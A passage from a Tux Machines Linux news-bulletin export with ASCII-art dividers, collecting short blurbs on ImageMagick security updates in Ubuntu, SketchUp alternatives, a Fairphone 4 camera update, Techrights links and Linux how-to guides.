Several_ImageMagick_Vulnerabilities_Addressed_in_Ubuntu⠀⇛ ImageMagick, a popular image manipulation program and library, has been exposed to several vulnerabilities that could leave your system vulnerable to denial-of-service (DoS) attacks. In response, the Ubuntu security team has promptly released security updates to address these issues across various Ubuntu releases. Let’s delve into the details of these vulnerabilities and their mitigation measures. ䷩ 𝚕𝚒𝚗𝚎 3042 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/The_6_Best_Alternatives_to_SketchUp_for_Ubuntu.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/The_6_Best_Alternatives_to_SketchUp_for_Ubuntu.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ The 6 Best Alternatives to SketchUp for Ubuntu⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Rianne Schestowitz on Mar 29, 2024 🄸🄼🄰🄶🄴_🄳🄴🅂🄲🅁🄸🄿🅃🄸🄾🄽_⦇blender_icon⦈_ As an advocate for open-source software, finding alternatives to popular proprietary software like SketchUp for 3D modeling on Ubuntu has been both a challenge and an adventure. SketchUp is widely used for architectural designs, interior design, video game design, and more, but its limited compatibility with Linux systems drives us to explore other options. Here, I’ll share the six best alternatives to SketchUp for Ubuntu, diving into their features, installation processes, and why they made it to my list. Let’s explore the world of 3D modeling on Linux together! Read_on ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⢿⣿⣿⠛⠿⢿⠛⡿⠿⢿⣿⠿⢿⡿⠿⢻⠿⠿⣿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⣀⣿⣿⠀⠶⢀⠀⡀⠭⢤⠀⣶⢀⠐⠗⢀⠠⠥⡄⢰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ䷩ 𝚕𝚒𝚗𝚎 3083 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/The_Fairphone_4_Camera_Refresh_Before_and_After.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/The_Fairphone_4_Camera_Refresh_Before_and_After.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ The Fairphone 4 Camera Refresh: Before and After⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Rianne Schestowitz on Mar 29, 2024 🄸🄼🄰🄶🄴_🄳🄴🅂🄲🅁🄸🄿🅃🄸🄾🄽_⦇Fairphone_4⦈_ We spent a day cruising through Amsterdam to get a good feel for the before and after of the Fairphone 4 camera upgrade IRL. As you can see, much fun was had. Check it out. Photos are richer, sharper, and more true to life with better contrast, while videos are buttery smooth and ultra-high def, thanks to improved video stabilization and 4K capabilities. This was some of the feedback we have been seeing online from Fairphone 4 users who have been blown away by the recent camera software update. It’s not just users. Even the media have been singing praises about the revolutionary update and our commitment to software and device longevity. Here are some quick news bytes. Read_on ⣿⣿⣿⣿⣿⣿⣾⣿⣿⣿⣿⣷⣶⣿⣿⣿⣯⣺⡿⣓⠒⣾⣿⣿⣿⣿⣿⣿⣮⣼⣿⣿⣿⣴⠑⠀⡀⠀⣠⠠⡍⣁⣽⢣⣤⣿⢦⡙⣛⠛⣻⣿⣿⣿⣿⣿⡿⣿⣿⣯⣄⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣟⣿⣽⣿⣿⣽⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⣇⣽⣿⣿⣿⣿⣿⠿⠿⡿⠿⣿⣿⣿⣿⣿⣤⣦⡶⠒⢺⣿⡟⠛⠟⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢿⣿⣿⣠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣽⡿⢿⠋⠅⠂⠉⠓⠘⢛⣛⡛⢭⣿⣿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠦⠴⣦⣴⣿⣿⣿⣿⣿⣄⣰⣷⣿⡿⣿⡇⠀⣧⢄⣾⣿⣿⣿⣿⣿⣿⡹⣟⣿⣷⣿⣶⣯⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⡈⢀⣀⣀⣀⣤⣤⣲⣶⣒⣈⡉⠙⢻⣿⢯⣿⢿⠛⠛⠛⠉⢻⣶⣿⣦⣿⣦⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣄⣠⣵⣿⣿⣿⣿⣿⣿⢉⣍⡈⠛⠛⢿⠞⡀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⢖⡉⠥⠤⢶⠚⠻⠿⠟⠇⠻⡿⢷⣾⣝⣗⢭⢉⠱⢤⣶⣿⣿⡬⠙⠉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣟⣉⣭⡟⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠛⠛⠛⠀⠀⠀⠈⠁⠛⠝⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣶⡬⠀⢁⡂⣀⣲⠆⠀⢀⡤⠴⢈⡡⠰⣶⣼⣭⣭⣽⠛⠻⣿⡶⢶⡿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⣿⣟⣂⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠆⢠⡤⠀⠀⠀⠐⠀⡆⠀⣾⣯⣽⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⠟⠁⠐⠛⠛⠃⠀⠀⠒⣿⡒⠀⠀⠀⠀⢀⣀⠀⠀⠈⠀⠀⠐⠀⠀⠉⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⠉⠙⠛⠛⠛⢻⣿⣿⣿⣿⣿⣿⣿⣿⡟⠻⣿⣿⠀⠀⢰⡗⢸⡇⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠀⢀⡰⣮⣯⡨⡿⠟⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠄⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⡿⡖⠀⠀⢨⣥⢸⡇⠐⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣶⢀⣈⡀⠀⢀⣤⣽⣴⣤⣀⠀⠀⠀⠋⠁⠀⣴⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⣿⡇⠀⠀⢸⡫⢸⠁⠀⣿⣿⣿⣿⠙⣿⣿⣿⡿⣿⣿⣿⣿⣿⣿⣿⣿ ⠃⢛⠋⠁⢘⢋⢰⣾⠉⠈⠉⠀⠀⠀⠀⠀⠉⠉⠀⠀⠀⠀⠀⢀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⡿⢃⢀⠀⣺⠃⢸⡌⠀⣿⣿⣿⣿⡇⠀⠿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿ ⠠⠈⢠⠾⠿⢿⡗⠳⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣲⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⢀⡄⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣨⣥⣽⣿⠑⠾⡂⠟⣛⠢⣿⣿⣿⣿⣿⣐⣿⣿⣛⣿⣿⣿⣿⣿⣿⣿⣿ ⠀⠀⠰⠿⠁⡀⠐⣀⣀⢀⣀⣀⣤⣤⡤⣤⣤⣤⣴⡶⢦⣆⡦⣴⣌⣦⡿⠿⠿⠿⠿⢿⣿⡿⠿⣟⠁⠀⠀⠈⢃⣙⣛⠛⠓⠿⠯⠽⠿⠿⢋⣷⣶⣶⣶⣿⣿⣿⣿⣿⡇⣿⣟⣻⣿⣿⡉⢺⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⠀⣸⣫⣤⣈⢉⠻⠟⠋⣨⣶⣿⣽⢿⣏⠁⢿⢿⠿⠟⣂⡄⣨⣿⣿⣛⣱⣶⣤⡄⢉⣾⣿⣿⣿⣿⡀⠀⠀⠀⢸⣿⣿⢎⡈⠂⠐⠛⠛⠃⠺⠿⠿⠛⢛⠛⠛⠛⠛⠛⠁⣿⣿⣿⣿⣷⠦⢀⣀⡬⡿⣵⣾⡿⣿⣿⣿⣿ ䷩ 𝚕𝚒𝚗𝚎 3136 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Today_in_Techrights.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Today_in_Techrights.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Today in Techrights⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 🄸🄼🄰🄶🄴_🄳🄴🅂🄲🅁🄸🄿🅃🄸🄾🄽_⦇Microbit_board_ready_for_programming._Ready_to_use_IoT.⦈_ ⚓ Updated This Past Day⠀⇛ 1. ⚓ Links_28/03/2024:_Sega,_Nintendo,_and_Bell_Layoffs⠀⇛ Links for the day 2. ⚓ Open_letter_to_the_ACM_regarding_Codes_of_Conduct_impersonating_the Code_of_Ethics⠀⇛ Reprinted with permission from Daniel Pocock 3. ⚓ With_9_Mentions_of_Azure_In_Its_Latest_Blog_Post,_Canonical_is_Again Promoting_Microsoft_and_Intel_Vendor_Lock-in,_Surveillance,_Back_Doors, Considerable_Power_Waste,_and_Defects_That_Cannot_be_Fixed⠀⇛ Microsoft did not even have to buy Canonical (for Canonical to act like it happened) 4. ⚓ Links_28/03/2024:_GAFAM_Replacing_Full-Time_Workers_With_Interns_Now⠀⇛ Links for the day 5. ⚓ Consent_&_Debian's_illegitimate_constitution⠀⇛ Reprinted with permission from Daniel Pocock 6. ⚓ The_Time_Our_Server_Host_Died_in_a_Car_Accident⠀⇛ If Debian has internal problems, then they need to be illuminated and then tackled, at the very least in order to ensure we do not end up with "Deadian" 7. ⚓ China's_New_'IT'_Rules_Are_a_Massive_Headache_for_Microsoft⠀⇛ On the issue of China we're neutral except when it comes to human rights issues 8. ⚓ Over_at_Tux_Machines...⠀⇛ GNU/Linux news for the past day 9. ⚓ IRC_Proceedings:_Wednesday,_March_27,_2024⠀⇛ IRC logs for Wednesday, March 27, 2024 10. ⚓ WeMakeFedora.org:_harassment_decision,_victory_for_volunteers_and Fedora_Foundations⠀⇛ Reprinted with permission from Daniel Pocock 11. ⚓ Links_27/03/2024:_Terrorism_Grows_in_Africa,_Unemployment_in_Finland Rose_Sharply_in_a_Year,_Chinese_Aggression_Escalates⠀⇛ Links for the day ========================================================================= The corresponding text-only bulletin for Thursday contains all the text. Top-read articles (excluding bot/crawler visits): Span from 2024-03-22 to 2024-03-28 2158 /n/2024/03/26/ In_At_Least_Two_Nations_Windows_is_Now_Measured_at_2_Market_Sha.shtml 1466 /n/2024/03/24/ Microsoft_is_Aiming_for_the_Destruction_of_All_Free_Software.shtml 1444 /n/2024/03/23/ Canonical_and_Red_Hat_Keep_Competing_Over_Who_Can_Suck_up_to_Mi.shtml ⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠛⣿⣿⠈⠁⠈⠁⠠⡄⠀⠀⢰⣶⣶⣶⣶⣦⡄⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀⠀⣼⣿⣿⣿⠓⠖⠛⠀⠀⠀⠈⠩⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡗⠀⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⢠⡀⠿⣿⣿⣿⣿⡛⠃⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⢀⡀⢿⣿⣿⠃⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⢂⠀⠀⠀⠁⠀⣀⣀⣤⣴⣾⣿⡿⣿⣷⣄⡏⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⣟⣉⣿⣿⣯⣬⣠⣤⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡷⠃⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠃⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣟⡇⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡌⣿⣿⣿⣿⣿⣿⣿⣿⢿⣿⣿⣿⡿⠿⠿⠿⣿⣿⢛⣿⣾⢿⣯⣭⠻⣿⣿⣿⡿⠁⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⣿⣧⢻⣿⣿⣇⢹⣿⣿⣿⣿⢋⣽⣟⣸⣿⣿⣿⢀⣾⠛⣡⣾⠿⣿⡉⣵⣾⣿⣿⣦⢻⣿⣿⠄⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⡇⣿⣿⡏⢸⣿⣿⢸⣿⣿⣿⢸⣿⣿⣿⣿⣾⣿⢹⣿⣿⣿⣿⠀⡃⢸⣿⣿⣶⠿⣧⡹⠿⣿⣉⡿⣸⣿⡘⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⢇⣿⣿⢇⣼⣿⢟⣼⣿⣿⡟⣠⣿⣿⣿⣿⣭⣭⣾⣿⣿⣿⣿⣔⢇⣼⣿⣿⣿⣟⡛⢿⡶⠿⢛⣴⣿⣿⣷⣀⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢯⣭⢹⣿⣿⣿⣿⣿⣿⣿⣽⡌⣿⣿⣿⣿⡿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡍⢿⣿⣿⠟⠛⠛⠉⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⡀⠀⡀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢒⣒⠘⠛⠻⣿⣿⣿⣿⣿⣿⡇⣿⣿⣿⡿⠇⠥⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢗⡌⠁⠀⠀⠀⠀⠀⠀⠀⠀⠹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⠧⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡯⠭⠉⣵⣒⣒⢸⣿⣿⣿⣿⣿⡇⢸⣿⣿⣇⠨⠨⠈⣠⣿⣿⣿⣿⣿⣿⣿⣿⣿⡙⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⢤⡤⠯⠤⠄⣼⣿⣿⣿⣿⣿⡿⣸⣿⣿⣿⣯⠬⠄⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡧⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣾⣯⣤⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡍⢅⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⠀⠀⠀⣀⣠⣤⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠛⠁⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣤⣤⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢿⣿⠛⠛⠃⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣛⣛⣋⠉⠁⠈⢉⣹⣧⣂⣀⣀⣀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⠟⠛⠛⠛⠛⠛⠛⢻⣿⣿⡟⣋⣉⣉⣉⣉⣉⣉⣀⣀⡀⠀⣹⣿⣿⠟⠛⢛⣋⣉⣉⣀⣤⣤⣤⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠂⠸⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡗⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⡿⣿⣿⣿⡿⠿⡿⠿⠿⠟⠁⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣠⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⠀⠉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠸⠿⠿⠿⠿⠿⠿⠿⠿⠿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣇⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣿⣿⣿⣿⠛⠛⠛⠋⠉⠉⠀⠀⢀⠀⡀⡀⠻⠿⠿⠿⠟⠛⠛⠛⠛⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⠙⠅⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ䷩ 𝚕𝚒𝚗𝚎 3278 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/today_s_howtos.1.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/today_s_howtos.1.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ today's howtos⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ H2S Media ☛ 3_Ways_to_Install_Kazam_Screen_Recorder_on_Ubuntu_Linux⠀⇛ Whether you are using Ubuntu 24.04, 22.04, 20.04, or any older version, the single APT command is enough to install the popular Kazam screen recorder on Ubuntu Linux, here are the steps to follow… Kazam, if you don’t know, is a free and open- source [...] * ⚓ LinuxTuto ☛ How_to_Install_Jupyter_Notebook_on_Debian_12⠀⇛ Jupyter Notebook is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations, and narrative text. * ⚓ TecMint ☛ Wine_9.0_–_Run_Windows_Apps_and_Games_on_Linux⠀⇛ Recently, the Wine team proudly announced the stable release of version 9.0, which is now available for download as the source and binary packages for various distributions including Linux, Windows, and Mac. * ⚓ TecMint ☛ How_to_Install_Wine_on_Debian,_Ubuntu_and_Linux_Mint⠀⇛ Recently, the Wine team happily announced the new version 9.0 is ready for download. You can get it as source or binary packages for different systems like Linux, Windows, and Mac. * ⚓ OSTechNix ☛ How_To_Install_Nix_Package_Manager_In_Linux⠀⇛ * ⚓ OSTechNix 